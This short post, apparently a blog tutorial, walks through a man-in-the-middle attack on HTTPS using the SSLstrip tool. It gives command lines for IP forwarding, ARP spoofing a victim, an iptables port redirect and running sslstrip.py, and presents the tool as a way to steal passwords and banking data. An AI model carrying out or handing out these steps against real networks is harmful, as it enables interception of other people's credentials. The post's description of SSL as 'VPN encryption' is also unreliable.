“Secure” Socket Layer (SSL)
Are you really sure that SSL connections are strong?. I mean, nobody can intercept your traffic, your passwords or even your bank account number. SSL is one of the world’s most important VPN encryption.
There is a tool (SSL strip) that the author claims to have used it to steal data from the most important and “safe” websites. This man is Moxie. A recognized security consultant.
1st – Configure IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
2nd – Perform a Main-in-the-middle ARP attack
arpspoof -i eth0 -t VICTIM
3rd – Redirect traffic through iptables
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
4th – Start SSLStrip in used port
python sslstrip.py -w archivo
Moxie’s website: http://www.thoughtcrime.org